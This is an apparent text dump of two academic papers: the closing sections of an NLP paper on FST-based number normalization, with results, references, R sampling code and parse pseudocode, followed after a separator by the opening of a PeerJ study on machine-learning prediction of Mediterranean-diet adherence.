model consists of four components: 1. A language-independent covering grammar F, transducing from integers expressed as digit se- quences to the set of possible factorizations for that integer 2. A language-specific numeral map M, transduc- ing from digit sequences to numerals 3. A language-specific verbalization grammar G, accepting only those factorizations which are licit in the target language 4. A language-specific lexical map L, transducing from sequences of numerals (e.g., 20) to num- ber names (already defined) As the final component, the lexical map L, has al- ready been described, we proceed to describe the re- maining three components of the system. 4.1.1 Finite-state transducer algorithms While we assume the reader has some familiarity with FSTs, we first provide a brief review of a few key algorithms we employ below. Our FST model is constructed using composition, denoted by the ◦ operator. When both arguments to composition are transducers, composition is equiva- lent to chaining the two relations described. For ex- ample, if A transduces string x to string y, and B trans- duces y to z, then A ◦ B transduces from string x to string z. When the left-hand side of composition is a transducer and the right-hand side is an accep- tor, then their composition produces a transducer in which the range of the left-hand side relation is inter- sected with the set of strings accepted by the right- hand side argument. Thus if A transduces string x to strings {y, z}, and B accepts y then A ◦ B transduces from x to y. We make use of two other fundamental operations, namely inversion and projection. Every transducer A has an inverse denoted by A−1, which is the trans- ducer such that A−1(y) → x if and only if A(x) → y. Any transducer A also has input and output projec- tions denoted by πi(A) and πo(A), respectively. If the transducer A has the domain α∗ and the range β∗, then πi(A) is the acceptor over α∗ which accepts x if and only if A(x) → y for some y ∈ β∗; output pro- jection is defined similarly. The inverse, input pro- jection, and output projection of an FST (or a push- down transducer) are computed by swapping and/or copying the input or output labels of each arc in the machine. See Mohri et al., 2002 for more details on these and other finite-state transducer algorithms. 4.1.2 Covering grammar Let A be an FST which, when repeatedly applied to an arithmetic s-expression string, produces the s- expression’s value. For example, one application of A to (+ (* 4 20) 10 7) produces (+ 80 10 7), and a second application produces 97. Let μ be the set of s-expression markup symbols {‘(’, ‘)’, ‘+’, ‘*’} and Δ be the set {0, 1, 2, . . . , 9}. Then, F : Δ∗ → (μ ∪ Δ)∗ = A−1 ◦ A−1 ◦ A−1 . . . (1) is an FST which transduces an integer expressed as a digit string to all its candidate factorizations expressed as s-expression strings.7 Let C(d) = πo (d ◦ F), which maps from a digit sequence d to the set of all possible factorizations—in any language—of that digit sequence, encoded as s- expressions. For example, C(97) contains strings such as: (+ 90 7) (+ 80 10 7) (+ (* 4 20) 10 7) … 4.1.3 Grammar inference Let M : (μ ∪ Δ)∗ → ν∗ be a transducer which deletes all markup symbols in μ and replaces se- quences of integers expressed as digit sequences with the appropriate numerals in ν. Let D(l) = πi (M ◦ L ◦ l), which maps from a verbalization l to the set of all s-expressions which contain l as ter- minals. For example, D(4 20 10 7) contains: 7In practice, our s-expressions never have a depth exceeding five, so we assume F = A−1 ◦ A−1 ◦ A−1 ◦ A−1 ◦ A−1. 512 S → (7 | 90 | * | +) ∗ → (7 | 90 | +) 1000 + → 90 7 Table 4: A fragment of an English number grammar which accepts factorizations of the numbers {7, 90, 97, 7000, 90000, and 97000}. S represents the start symbol, and ‘|’ denotes disjunction. Note that this fragment is regular rather than context-free, though this is rarely the case for complete grammars. (+ 4 20 10 7) (+ 4 20 (* 10 7)) (+ (* 4 20) 10 7) … Then, given (d, l) where d ∈ Δ∗ is an integer ex- pressed as a digit sequence, and l ∈ λ∗ is d’s verbal- ization, their intersection E(d, l) = C(d) ◦ D(l) (2) will contain the factorization(s) of d that verbalizes as l. In most cases, E will contain exactly one path for a given (d, l) pair. For instance, if d is 97000 and l is ninety seven thousand, E(d, l) is (* (+ 90 7) 10000). We can use E to induce a context-free grammar (CFG) which accepts only those number verbaliza- tions present in the target language. The simplest pos- sible such CFG uses ‘*’ and ‘+’ as non-terminal la- bels, and the elements in the domain of L (e.g., 20) as terminals. The grammar will then consist of binary productions extracted from the s-expression deriva- tions produced by E. Table 4 provides a fragment of such a grammar. With this approach, we face the familiar issues of ambiguity and sparsity. Concerning the former, the output of E is not unique for all outputs. We address this either by applying normal form constraints on the set of permissible productions, or ignoring am- biguous examples during induction. One case of am- biguity involves expressions involving addition with 0 or multiplication by 1, both identity operations that leave the identity element (i.e., 0 or 1) free to asso- ciate either to the left or to the right. From our per- spective, this ambiguity is spurious, so we stipulate that identity elements may only be siblings to (i.e., on the right-hand side of a production with) another digit → (2 | 3 | 4 | …9) teen → (11 | 12 | 13 | …19) decade → (20 | 30 | 40 |…90) century → (200 | 300 | 400 | …900) power_of_ten → (1000 | 10000 | …) Table 5: Optional preterminal rules. terminal. Thus an expression like one thousand one hundred can only be parsed as (+ (* 1 1000) (* 1 100)). But not all ambiguities can be handled by normal form constraints. Some expressions are am- biguous due to the presence of “palindromes” in the verbalization string. For instance, two hundred two can either be parsed as (+ 2 (* 100 2)) or (+ (* 2 100)). The latter derivation is “correct” insofar as it follows the syntactic patterns of other English number expressions, but there is no way to deter- mine this except with reference to the very language- specific patterns we are attempting to learn. There- fore we ignore such expressions during grammar in- duction, forcing the relevant rules to be induced from unambiguous expressions. Similarly, multiplication and addition are associative so expressions like three hundred thousand can be binarized either as (* (* 3 100) 10000) or (* 3 (* 100 1000)), though both derivations are equally “correct”. Once again we ig- nore such ambiguous expressions, instead extracting the relevant rules from unambiguous expressions. Since we only admit two non-terminal labels, the vast majority of our rules contain numeral terminals on their right-hand sides, and as a result, the num- ber of rules tends to be roughly proportional to the size of the terminal vocabulary. Thus it is common that we have observed, for instance, thirteen thou- sand and fourteen million but not fourteen thousand or thirteen million, and as a result, the CFG may be deficient simply due to sparsity in the training data, particularly in languages with large terminal vocab- ularies. To enhance our ability to generalize from a small number of examples, we optionally insert preterminal labels during grammar induction to form classes of terminals assumed to pattern together in all productions. For instance, by introducing ‘teen’ and ‘power_of_ten’ preterminals, all four of the previous expressions are generated by the same top-level pro- duction. The full set of preterminal labels we use here are shown in Table 5. 513 In practice, obtaining productions using E is inef- ficient: it is roughly equivalent to a naïve algorithm which generates all possible derivations for the nu- merals given, then filters out all of those which do not evaluate to the expected total, violate the afore- mentioned normal form constraints, or are otherwise ambiguous. This fails to take advantage of top-down constraints derived from the particular structure of the problem. For example, the naïve algorithm en- tertains many candidate parses for quatre-vingt-dix- sept ‘97’ where the root is ‘*’ and the first child is ‘4’, despite the fact that no such hypothesis is viable as 4 is not a divisor of 97. We inject arithmetic constraints into the gram- mar induction procedure, as follows. The inputs to the modified algorithm are tuples of the form (T, ν0, . . . , νn) where T is the numeric value of the expression and ν0, . . . , νn are the n + 1 numerals in the verbalization. Consider a hypothesized numeric value of the leftmost child of the root, T0...i, which dominates ν0, . . . , νi where i < n. For this to be vi- able, it must be the case that T0...i ≤ T. And, if we further hypothesize that the root node is ‘+’, then the remaining children must evaluate to T−T0...i. Simi- larly, if we hypothesize that the root node is ‘*’, then the remaining children must evaluate to T/T0...i, and this quantity must be integral. This approach can be implemented with a back- tracking recursive descent parser enforcing the afore- mentioned normal form constraints and propagat- ing the top-down arithmetic constraints. In practice, however, we implement the search using a straight- forward dynamic programming algorithm. The algo- rithm proceeds by recursively generating all possi- ble leftmost children of the tree and then using these top-down constraints to prune branches of the search space which have no viable completion (though our implementation does not fully propagate these con- straints). While the number of left subtrees is expo- nential in the length of the verbalization, our imple- mentation remains feasible since real-world exam- ples tend to have verbalizations consisting of rela- tively few terminals. Pseudocode for our implemen- tation is provided in Appendix B. 4.1.4 Grammar compilation Once productions have been collected, they are used to specify a recursive transition network (Woods, 1970) which is then compiled into a push- down acceptor (Allauzen and Riley, 2012) over ν∗, henceforth G. An example is shown in Figure 2. 4.1.5 Final model and remaining issues Then, the verbalization for d is given by V(d) = πo (d ◦ F ◦ M ◦ G ◦ L) . (3) As noted above, the lexicon transducer L is non- functional when there are multiple number names for a single numeral, as may arise in number systems with allomorphy or morphological concord. When this is the case, we compose the lattice produced byV with a language model (LM) of verbalized numbers (over λ∗) and then decode using the shortest path al- gorithm. Note that whereas the construction of G re- quires parallel data, the LM requires only “spoken” data. While it is not common in most languages to write out complex cardinal numbers in their verbal- ized form, it is nonetheless possible to find a large sample of such expressions at web scale (Sproat, 2010); such expressions can be identified by match- ing against the unweighted πo (F ◦ M ◦ G ◦ L). 4.2 Materials and methods The FST-based verbalizer V was constructed and evaluated using four languages: English, Georgian, Khmer, and Russian (the latter targeting citation forms only). The medium and minimal sets are used for all four languages; in Russian, we also reuse the large data set (see §3.1). In all cases the test sets consisted of 1,000 randomly generated examples, the same examples as in previous experiments. The size of V varied by language, with the small- est, English, consisting of roughly 8,000 states and arcs, and the largest, Russian, measuring roughly 80,000 states and arcs and comprising approximately a megabyte of uncompressed binary data. No LM was required for either English or Khmer as both have a functional L. However, the Georgian and Russian L are both ambiguous, so the best path through the output lattice was selected according to a trigram language model with Witten-Bell smooth- ing. The language models were constructed using the medium training set. 514 0 1 7 90 2 (* 5 (+ (+ 3 7 90 690 41000 )* 77 )+)+ Figure 2: A pushdown acceptor that accepts all the language of the grammar fragment in Table 4. Arc labels that contain parentheses indicate “push” and “pop” stack operations, respectively, and must balance along a path. Locale Training size Num. acc. Morph. acc. Overlap eng_us 9,000 1.000 1.000 0% 300 1.000 1.000 < 1% kat_ge 9,000 1.000 1.000 0% 300 1.000 1.000 < 1% khm_kh 9,000 1.000 1.000 0% 300 1.000 1.000 < 1% rus_ru 28,000 1.000 1.000 56% 9,000 1.000 0.998 0% 300 1.000 0.998 < 1% Table 6: Evaluation of the FST verbalizer on English (eng_us), Georgian (kat_ge), Khmer (kmh_kh), and Russian (rus_ru); errors are separated into those which affect the numeric denotation (“Num. acc.”) and those which merely use incorrect morphological forms (“Morph. acc.”). 515 4.3 Results and discussion The results were excellent for all four languages. There were no errors at all in English, Georgian, and Khmer with either data set. While there were a few errors in Russian, crucially all were agree- ment errors rather than errors in the factorization itself, exactly the opposite pattern of error to the ones we observed with the LSTM model. For example, 70,477,170 was rendered as семьдесят миллион четыреста семьдесят семь тысяч сто семьдесят; the second word should be миллионов, the genitive plural form. More surprisingly, verbalizers trained on the 300 examples of the minimal data set per- formed just as well as ones trained with two orders of magnitude more labeled data. 5 Discussion We presented two approaches to number normaliza- tion. The first used a general RNN architecture that has been used for other sequence mapping problems, and the second an FST-based system that uses a fair amount of domain knowledge. The RNN approach can achieve very high accuracy, but with two caveats: it requires a large amount of training data, and the er- rors it makes may result in the wrong number. The FST-based solution on the other hand can learn from a tiny dataset, and never makes that particularly per- nicious type of error. The small size of training data needed and the high accuracy make this a particu- larly attractive approach for low-resource scenarios. In fact, we suspect that the FST model could be made to learn from a smaller number of examples than the 300 that make up the “minimal” set. Finding the min- imum number of examples necessary to cover the entire number grammar appears to be a case of the set cover problem—-which is NP-complete (Karp, 1972)—but it is plausible that a greedy algorithm could identify an even smaller training set. The grammar induction method used for the FST verbalizer is near to the simplest imaginable such procedure: it treats rules as well-formed if and only if they have at least one unambiguous occurrence in the training data. More sophisticated induction methods could be used to improve both generalization and ro- bustness to errors in the training data. Generalization might be improved by methods that “hallucinate” un- observed productions (Mohri and Roark, 2006), and robustness could be improved using manual or au- tomated tree annotation (e.g., Klein and Manning, 2003; Petrov and Klein, 2007). We leave this for fu- ture work. Above, we focused solely on cardinal numbers, and specifically their citation forms. However, in all four languages studied here, ordinal numbers share the same factorization and differ only superficially from cardinals. In this case, the ordinal number ver- balizer can be constructed by applying a trivial trans- duction to the cardinal number verbalizer. However, it is an open question whether this is a universal or whether there may be some languages in which the discrepancy is much greater, so that separate meth- ods are necessary to construct the ordinal verbalizer. The FST verbalizer does not provide any mech- anism for verbalization of numbers in morphologi- cal contexts other than citation form. One possibility would be to use a discriminative model to select the most appropriate morphological variant of a number in context. We also leave this for future work. One desirable property of the FST-based system is that FSTs (and PDTs) are trivially invertible: if one builds a transducer that maps from digit sequences to number names, one can invert it, resulting in a trans- ducer that maps number names to digit sequences. (Invertibility is not a property of any RNN solution.) This allows one, with the help of the appropriate target-side language model, to convert a normaliza- tion system into a denormalization system, that maps from spoken to written form rather than from written to spoken. During ASR decoding, for example, it is often preferable to use spoken representations (e.g., twenty-three) rather than the written forms (e.g., 23), and then perform denormalization on the resulting transcripts so they can be displayed to users in a more-readable form (Shugrina, 2010; Vasserman et al., 2015). In ongoing work we are evaluating FST verbalizers for use in ASR denormalization. 6 Conclusions We have described two approaches to number nor- malization, a key component of speech recognition and synthesis systems. The first used a recurrent neu- ral network and large amounts of training data, but very little knowledge about the problem space. The second used finite-state transducers and a learning 516 method totally specialized for this domain but which requires very little training data. While the former approach is certainly more appealing given current trends in NLP, only the latter is feasible for low- resource languages which most need an automated approach to text normalization. To be sure, we have not demonstrated than RNNs—or similar models—are inapplicable to this problem, nor does it seem possible to do so. How- ever, number normalization is arguably a sequence- to-sequence transduction problem, and RNNs have been shown to be viable end-to-end solutions for sim- ilar problems, including grapheme-to-phoneme con- version (Rao et al., 2015) and machine translation (Sutskever et al., 2014), so one might reasonably have expected them to have performed better without making the “silly” errors that we observed. Much of the recent rhetoric about deep learning suggests that neural networks obviate the need for incorporating detailed knowledge of the problem to be solved; in- stead, one merely needs to feed pairs consisting of inputs and the required outputs, and the system will self-organize to learn the desired mapping (Graves and Jaitly, 2014). While that is certainly a desirable ideal, for this problem one can achieve a much more compact and data-efficient solution if one is willing to exploit knowledge of the domain. Acknowledgements Thanks to Cyril Allauzen, Jason Eisner, Michael Ri- ley, Brian Roark, and Ke Wu for helpful discus- sion, and to Navdeep Jaitly and Haşim Sak for as- sistance with RNN modeling. All finite-state mod- els were constructed using the OpenGrm libraries (http://opengrm.org). References Cyril Allauzen and Michael Riley. 2012. A pushdown transducer extension for the OpenFst library. In CIAA, pages 66–77. Richard Beaufort, Sophie Roekhaut, Louise-Amélie Cougnon, and Cédrick Fairon. 2010. A hybrid rule/model-based finite-state framework for normaliz- ing SMS messages. In ACL, pages 770–779. William Chan, Navdeep Jaitly, Quoc V. Le, and Oriol Vinyals. 2016. Listen, attend and spell: A neural net- work for large vocabulary conversational speech recog- nition. In ICASSP, pages 4960–4964. Jeffrey T. Chang, Hinrich Schütze, and Russ B. Altman. 2002. Creating an online dictionary of abbreviations from MEDLINE. Journal of the American Medical In- formatics Association, 9(6):612–620. H. Brandt Corstius, editor. 1968. Grammars for number names. D. Reidel, Dordrecht. Peter Ebden and Richard Sproat. 2014. The Kestrel TTS text normalization system. Natural Language Engi- neering, 21(3):1–21. Alex Graves and Navdeep Jaitly. 2014. Towards end-to- end speech recognition with recurrent neural networks. In ICML, pages 1764–1772. Alex Graves, Santiago Fernández, Gaustino Gomez, and Jürgen Schmidhuber. 2006. Connectionist tempo- ral classification: Labeling unsegmented sequence data with recurrent neural networks. In ICML, pages 369– 376. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural Computation, 9(8):1735– 1780. James R. Hurford. 1975. The Linguistic Theory of Nu- merals. Cambridge University Press, Cambridge. Jakub Kanis, Jan Zelinka, and Luděk Müller. 2005. Auto- matic number normalization in inflectional languages. In SPECOM, pages 663–666. Richard M. Karp. 1972. Reducibility among combina- torial problems. In Raymond E. Miller and James W. Thatcher, editors, Complexity of Computer Computa- tions, pages 85–103. Plenum, New York. Dan Klein and Christopher D. Manning. 2003. Accurate unlexicalized parsing. In ACL, pages 423–430. Tom Kwiatkowski, Luke Zettlemoyer, Sharon Goldwater, and Mark Steedman. 2011. Lexical generalization in CCG grammar induction for semantic parsing. In EMNLP, pages 1512–1523. Karl Menninger. 1969. Number Words and Number Sym- bols. MIT Press, Cambridge. Translation of Zahlwort und Ziffer, published by Vanderhoeck & Ruprecht, Breslau, 1934. Volodymyr Mnih, Nicolas Heess, Alex Graves, and Ko- ray Kavukcuoglu. 2014. Recurrent models of visual attention. In NIPS, pages 2204–2212. Mehryar Mohri and Brian Roark. 2006. Probabilistic context-free grammar induction based on structural ze- ros. In NAACL, pages 312–319. Mehryar Mohri, Fernando Pereira, and Michael Riley. 2002. Weighted finite-state transducers in speech recognition. Computer Speech & Language, 16(1):69– 88. Deana Pennell and Yang Liu. 2011. Toward text message normalization: Modeling abbreviation generation. In ICASSP, pages 5364–5367. 517 Slav Petrov and Dan Klein. 2007. Improved inference for unlexicalized parsing. In NAACL, pages 404–411. Kanishka Rao, Fuchun Peng, Haşim Sak, and Françoise Beaufays. 2015. Grapheme-to-phoneme conversion using long short-term memory recurrent neural net- works. In ICASSP, pages 4225–4229. Brian Roark and Richard Sproat. 2014. Hippocratic ab- breviation expansion. In ACL, pages 364–369. Maria Shugrina. 2010. Formatting time-aligned ASR transcripts for readability. In NAACL, pages 198–206. Richard Sproat, Alan W. Black, Stanley Chen, Shankar Kumar, Mari Ostendorf, and Christopher Richards. 2001. Normalization of non-standard words. Com- puter Speech and Language, 15(3):287–333. Richard Sproat. 1996. Multilingual text analysis for text- to-speech synthesis. Natural Language Engineering, 2(4):369–380. Richard Sproat. 2010. Lightly supervised learning of text normalization: Russian number names. In IEEE Work- shop on Speech and Language Technology, pages 436– 441. Ilya Sutskever, Oriol Vinyals, and Quoc V. Le. 2014. Se- quence to sequence learning with neural networks. In NIPS, pages 3104–3112. Paul Taylor. 2009. Text to Speech Synthesis. Cambridge University Press, Cambridge. Lucy Vasserman, Vlad Schogol, and Keith Hall. 2015. Sequence-based class tagging for robust transcription in ASR. In INTERSPEECH, pages 473–477. William A. Woods. 1970. Transition network grammars for natural language analysis. Communications of the ACM, 13(10):591–606. Yi Yang and Jacob Eisenstein. 2013. A log-linear model for unsupervised text normalization. In EMNLP, pages 61–72. 518 A Random sampling procedure Random-generated data sets were produced by sampling from a Yule-Simon distribution with ρ = 1, then rounding each sample’s k trailing digits, where k is a random variable in the discrete uniform distribution U{0, n} and n is the order of the sampled number. Duplicate samples were then removed. The following R function implements this procedure. require(VGAM) EPSILON <- 1e-12 rnumbers <- function(n) { x <- ryules(n, rho=1) num.digits <- floor(log10(x + EPSILON)) + 1 sig.digits <- ceiling(runif(n, min=0, max=num.digits)) unique(signif(x, sig.digits)) } B Parse generation algorithm The following algorithm is used to generate parses from parallel (written/spoken) data. It depends upon a procedure GetSubtrees(…) generating all possible labeled binary subtrees given a sequence of terminals, which is left as an exercise to the reader. 1: procedure GetOracles(T, v0, …, vn) ▷ Total T, terminals v0, …, vn. 2: if n = 1 then 3: if eval(v0) = T then 4: yield s-expression v0 5: end if 6: return 7: end if 8: for i ∈ 1 . . . n−1 do ▷ Size of left child. 9: for all L ∈ GetSubtrees(v0, …, vi) do 10: TL ← eval(L) 11: TR ← T − TL ▷ Hypothesizes + root. 12: if TR > 0 then 13: for all R ∈ GetOracles(TR, vi+1, …, vn) do 14: yield s-expression (+ L R) 15: end for 16: end if 17: TR ← T / TL ▷ Hypothesizes * root. 18: if TR ∈N then ▷ “is a natural number”. 19: for all R ∈ GetOracles(TR, vi+1, …, vn) do 20: yield s-expression (* L R) 21: end for 22: end if 23: end for 24: end for 25: end procedure 519 520 work_6mlcjuckcve7pcpruferfakk64 ---- Identification of predictive factors of the degree of adherence to the Mediterranean diet through machine-learning techniques Identification of predictive factors of the degree of adherence to the Mediterranean diet through machine-learning techniques Alba Arceo-Vilas1,*, Carlos Fernandez-Lozano2,3,*, Salvador Pita1,†, Sonia Pértega-Díaz1 and Alejandro Pazos2,3 1 Clinical Epidemiology and Biostatistics Research Group,, Instituto de Investigación Biomédica de A Coruña (INIBIC), Complexo Hospitalario Universitario de A Coruña (CHUAC), SERGAS, Universidade da Coruña, A Coruña, Spain 2 Department of Computer Science and Information Technologies, Faculty of Computer Science, CITIC-Research Center of Information and Communication Technologies, Universidade da Coruña, A Coruña, Spain 3 Grupo de Redes de Neuronas Artificiales y Sistemas Adaptativos. Imagen Médica y Diagnóstico Radiológico (RNASA-IMEDIR). Instituto de Investigación Biomédica de A Coruña (INIBIC). Complexo Hospitalario Universitario de A Coruña (CHUAC), SERGAS, Universidade da Coruña, A Coruña, Spain * These authors contributed equally to this work. † Deceased author. ABSTRACT Food consumption patterns have undergone changes that in recent years have resulted in serious health problems. Studies based on the evaluation of the nutritional status have determined that the adoption of a food pattern-based primarily on a Mediterranean diet (MD) has a preventive role, as well as the ability to mitigate the negative effects of certain pathologies. A group of more than 500 adults aged over 40 years from our cohort in Northwestern Spain was surveyed. Under our experimental design, 10 experiments were run with four different machine-learning algorithms and the predictive factors most relevant to the adherence of a MD were identified. A feature selection approach was explored and under a null hypothesis test, it was concluded that only 16 measures were of relevance, suggesting the strength of this observational study. Our findings indicate that the following factors have the highest predictive value in terms of the degree of adherence to the MD: basal metabolic rate, mini nutritional assessment questionnaire total score, weight, height, bone density, waist-hip ratio, smoking habits, age, EDI-OD, circumference of the arm, activity metabolism, subscapular skinfold, subscapular circumference in cm, circumference of the waist, circumference of the calf and brachial area. Subjects Bioinformatics, Artificial Intelligence, Data Mining and Machine Learning Keywords Feature selection, Nutritional status, Machine learning, Mediterranean diet, Support vector machines, Nutrition disorders INTRODUCTION The economic development, urbanisation and industrialisation worldwide have changed individuals’ eating habits and lifestyles, such as smoking, excessive consumption of alcohol, sedentary lifestyle and stress, leading to a nutritional transition which its principle cost in the health sector, is the appearance of non-transmissible chronic diseases. How to cite this article Arceo-Vilas A, Fernandez-Lozano C, Pita S, Pértega-Díaz S, Pazos A. 2020. Identification of predictive factors of the degree of adherence to the Mediterranean diet through machine-learning techniques. PeerJ Comput. Sci. 6:e287 DOI 10.7717/peerj- cs.287 Submitted 3 July 2019 Accepted 6 July 2020 Published 27 July 2020 Corresponding author Carlos Fernandez-Lozano, carlos.fernandez@udc.es Academic editor Yu-Dong Zhang Additional Information and Declarations can be found on page 13 DOI 10.7717/peerj-cs.287 Copyright 2020 Arceo-Vilas et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.287 http://dx.doi.org/10.7717/peerj-cs.287 mailto:carlos.�fernandez@�udc.�es https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.287 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ A consequence of the alteration of dietary patterns is what has been called ‘epidemic obesity’, defined by the World Health Organisation (WHO) as the first non-viral epidemic of the 21st century, with 500 million obese people worldwide (Finucane et al., 2011; Krzysztoszek, Wierzejska & Zielińska, 2015) affecting more than 50% of the adult population in Spain (López-Sobaler et al., 2016; Anta et al., 2013; Rodriguez Rodriguez et al., 2011). The assessment of nutritional status of a population is one of the best indicators of the health status of the said population, being a methodology that must include three important aspects: a global assessment, a study of the dimension and a study of body composition (Ravasco, Anderson & Mardones, 2010). With adequate interpretation of the findings, appropriate therapeutic measures should be taken to correct deviations from normality. In the context of nutrition and public health, the Mediterranean diet (MD) has been forged over the centuries, being characterised by cereal, olive oil, low saturated fats and meat, moderate consumption of dairy and a regular and moderate intake of wine, being a lifestyle in accordance with geographic, climatological, orographic, cultural and environmental conditions within the countries and regions that surround the Mediterranean Sea (Pérez & Aranceta, 2011). There is an increasing interest in the study of the preventive role of MD and also as a treatment for various pathologies associated with chronic inflammation, such as metabolic syndrome, diabetes mellitus, cardiovascular disease (CVD), neurodegenerative diseases, breast cancer and psycho-organic deterioration, leading to greater longevity and better quality of life (Dussaillant et al., 2016; Chrysohoou et al., 2004; Trichopoulou, 2004; Serra-Majem, Roman & Estruch, 2006; Estruch et al., 2013; Sofi et al., 2014; Della Camera et al., 2017). Moreover, the importance of MD has also been identified as a potential element contributing to the prevention of breast cancer (Shapira, 2017) or in patients carrying the BRCA mutation (Bruno et al., 2017). In 2010; UNESCO declared this diet an Intangible Cultural Heritage of Humanity (UNESCO, 2010). Numerous studies have been published over the past decades, showing the relationship between MD intake and CVD (Martínez-González et al., 2015; Widmer et al., 2015), and meta-analyses that relate it to general health status (Sofi et al., 2014). In the Greek cohort EPIC (European Prospective Investigation into Cancer and Nutrition Study) a 2-point increase in adherence to this diet was associated with a 33% reduction in CVD mortality (Sofi et al., 2014). Additionally, the analysis of a sub-cohort of 2,700 individuals over 60 years old, with a history of myocardial infarction showed that a greater adherence to MD had an 18% drop in overall mortality (Lack et al., 2003). Other studies have confirmed these associations, including the follow-up of a Spanish cohort of 13,600 adults with coronary heart disease. After 5 years, it was observed that two points of increase in adherence to MD were associated with a 26% decrease in coronary risk (Trichopoulou et al., 2007). Eating disorders are linked to a distorted perception of one’s own body image, as well as to body dissatisfaction. The importance of a study on body dissatisfaction is due to the fact that recent investigations have confirmed that alterations in body image have a causal Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 2/21 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ participation in an eating disorder, rather than being secondary to it (Míguez Bernárdez et al., 2011). Body image is considered a qualitative approximation to the nutritional status of the individual (Sámano et al., 2015) and can be determining for their nutritional management (Martínez-González et al., 2011). One of the main fields of application of Machine-Learning (ML) techniques since its origins is in the field of Biomedicine, finding previously published studies in related areas such as biomedical image (Fernandez-Lozano et al., 2016b), characterisation of different types of carcinomas (Kim et al., 2017), measurement of activity in genetic networks (Hu et al., 2016), deformable models for image comparison (Rodriguez et al., 2014), gene selection, and classification of microarray data (Díaz-Uriarte & De Andrés, 2006), to name a few. Moreover, due to the great versatility of ML techniques, they have been used in a wide variety of application areas, to discover hidden patterns in the datasets: identification and authentication of tequilas (Pérez-Caballero et al., 2017), wearable sensor data fusion (Kanjo, Younis & Sherkat, 2018), predicting the outcomes of organic reactions (Skoraczyñski et al., 2017), animal behaviour detection (Pons, Jaen & Catala, 2017) or to measure the visual complexity of images (Machado et al., 2015). In particular, ML techniques have proven to be able to uncover unimaginable relationships in very diverse fields of application, such as image or voice recognition, sentiment analysis or language translation (Li, Li & Wu, 2015; De Viñaspre & Oronoz, 2015). The main objective of this work is the development of ML models for the prediction of the degree of adherence to the MD. To this end, information on different anthropometric and socio-demographic variables, nutritional status and self-perception of body image is used in order to identify which of the variables have a greater influence and are key in the adherence to a healthy diet such as MD, allowing our patients to improve their quality of life and to reduce the negative effects of well-known and related diseases. Taking into account all of the above, the experimental methodology proposed in the development of this study is based on the collection and generation of data to be analysed with our cohort in Galicia (Spain), as well as on the use of ML techniques. The purpose is to extract and explain the underlying information in the data and determine which of these variables are the most important to classify people as having either a good or poor adherence to the MD. As mentioned before, there are several health benefits related to this particular food diet, especially for: chronic inflammation, metabolic syndrome, diabetes mellitus, CVD, neurodegenerative diseases, cancer and psycho-organic deterioration, moreover leading to greater longevity and better quality of life. Thus, this study is relevant for understanding how to measure the degree of adherence, in order to ensure the aforementioned benefits. The structure of the article is as follows: in the Materials and methods section, the subjects are presented, the variables are measured for each of them. Next, the machine learning and feature selection techniques are described, along with the experimental design followed to ensure that the results are reproducible and representative of the studied Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 3/21 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ problem. In the next section, the results are presented and discussed, and the final section of the article includes the conclusions of the work. MATERIALS AND METHODS The present study was structured as follows. Initially, a population from our cohort was selected to carry out the study; the population was grouped into two categories: with high and low degree of adherence to the MD. Once the set of the population on which the study will be carried out has been identified, the information is collected from each of the users of the health system. The type of study carried out will be described below, as well as the sample size will be justified and all measurements collected will be explained in detail. Once the dataset is generated, it will be analysed with four different ML techniques and a feature selection phase will be applied for dimensionality reduction. Population and data description This is an observational prevalence study, conducted in Northwestern Spain (municipality of Cambre, A Coruña, Spain), which included a randomly selected population aged 40 years and over. The sampling population consisted of individuals residing in Cambre, identified through the National Health System card census. In Spain, the National Health System has universal coverage, and almost all Spanish citizens are beneficiaries of public healthcare services. The sample size was calculated taking into account the total population of the municipality (n ¼ 12; 446). After stratification by age and gender, (n ¼ 503) persons were selected to participate in the study. Sample size was estimated using the single proportion formula, with 95% confidence Interval. A sample size of (n ¼ 503) subjects was estimated based on an adherence to MD rate of 50%. Precision was set at 4.3% and percentage of losses at 10%. Population data is shown in Table 1. Table 1 Population data of the municipality of Cambre (A Coruña) for the year 2012 and sample data according to age and sex. Age groups Population Sample Total Men Women Total Men Women 40–44 2,465 1,202 (26.9%) 1,263 (27.8%) 33 19 (12.9%) 14 (13.2%) 45–49 2,231 1,110 (24.8%) 1,121 (24.7%) 85 52 (35.4%) 33 (31.1%) 50–54 1,763 857 (19.2%) 906 (19.9%) 54 32 (21.8%) 22 (20.8%) 55–59 1,383 702 (15.7%) 681 (14.9%) 33 18 (12.3%) 15 (14.1%) 60–64 1,170 598 (13.4%) 572 (12.6%) 48 26 (17.7%) 22 (20.8%) Total (40–64) 9,012 4,469 4,543 253 147 106 65–69 1,027 497 (33%) 530 (27.5%) 94 57 (38%) 37 (37%) 70–74 688 337 (22.4%) 351 (18.2%) 77 46 (30.7%) 31 (31%) 75–79 777 326 (21.6%) 451 (23.4%) 46 28 (18.7%) 18 (18%) 80–84 511 198 (13.1%) 313 (16.2%) 24 12 (8%) 12 (12%) 85-more 431 148 (9.8%) 283 (14.7%) 9 7 (4.7%) 2 (2%) Total (65 and more) 3,434 1,506 1,928 250 150 100 Arceo-Vilas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.287 4/21 http://dx.doi.org/10.7717/peerj-cs.287 https://peerj.com/computer-science/ A personal interview was arranged with each individual. After obtaining their permission and written consent, a trained nurse proceeded to the measurement of anthropometric variables and to the collection of the necessary data to cover the questionnaires. The patients who could not go to the health centre due to personal or displacement reasons and those who suffer from a cognitive impairment, making it impossible for them to perform the study, were excluded. The study received written approval from the Regional Ethics Committee for Clinical Research (code 2012/390 CEIC Galicia). The information described below was collected from each selected subject: socio- demographic variables: age, gender, level of education, marital status and relationships of coexistence; prevalence of arterial hypertension and smoking: the systolic and diastolic blood pressure of each patient was recorded at the beginning and at the end of the visit, obtaining the prevalence of arterial hypertension; the smoking habit was recorded according to self-reported information. Anthropometric variables: the anthropometric parameters allow us to know the state of the protein and caloric reserves, besides providing guidance to the health professional about the consequences of the imbalances in these reserves. 